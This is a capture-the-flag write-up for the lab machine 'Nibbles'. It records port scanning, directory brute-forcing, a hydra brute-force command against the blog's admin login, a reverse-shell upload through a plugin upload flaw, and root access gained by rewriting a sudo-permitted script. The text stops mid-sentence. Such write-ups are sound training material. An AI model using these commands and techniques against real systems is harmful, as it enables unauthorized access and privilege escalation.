Nibbles is an easy Linux box that can be exploited by bruteforcing the administrator’s login page. After this you can install a malicious plugin due to a file upload vulnerability. Privileges can be escalated by replacing a monitoring script which can be run with sudo rights.
Nmap discovered the following open ports and services:
nmap -sC -sV -oN fullscan -Pn 10.129.25.188/ PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The first thing I checked was the webserver. The user is presented with a blank page that displays Hello world!. By checking the code (ctrl + u) it contains the following comment:
/nibbleblog/ directory. Nothing interesting here!
Naturally, you can navigate to: http://10.129.25.188/nibbleblog/.
Next, as usually, the website was bruteforced to discover hidden files and directories with dirb:
dirb http://10.129.25.188/nibbleblog/ -X .php
The results were as follows:
+ http://10.129.25.188/nibbleblog/admin.php (CODE:200|SIZE:1401)
Brute-Forcing the Login Page
Navigating here results in a login page. This can be bruteforced with hydra like this:
hydra -l admin -P /usr/share/wordlist/rockyou.txt -vV -f -t 2 10.129.25.188 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error" [ATTEMPT] target 10.129.25.188 - login "admin" - pass "password" - 1 of 10000 [child 0] (0/0) [ATTEMPT] target 10.129.25.188 - login "admin" - pass "123456" - 2 of 10000 [child 1] (0/0)
Hydra shows two options. Both are incorrect however. This is probably done on purpose by showing a different error message when entering these credentials. By simply guessing you will get in with admin & nibbles. Now you are presented with a standard dashboard.
A google search showed that:
Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.
Go to plugins > install and you will be able to upload a picture. This upload is vulnerable and you can simply upload a reverse shell. After clicking save changes it will display some warnings. You can ignore these and continue to http://10.129.25.190/nibbleblog/content/private/plugins/about/. It will show the php file you just uploaded and when clicking it will open a reverse shell as the user
nibbler. The user.txt is in the home directory of this user.
The next step is privilege escalation. I recommend running linpeas this gives a great deal of information such as:
User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
I simply created this file:
$ cat monitor.sh #!/bin/bash /bin/bash echo "worked"
sudo /home/nibbler/personal/stuff/monitor.sh you obtain a root shell and can open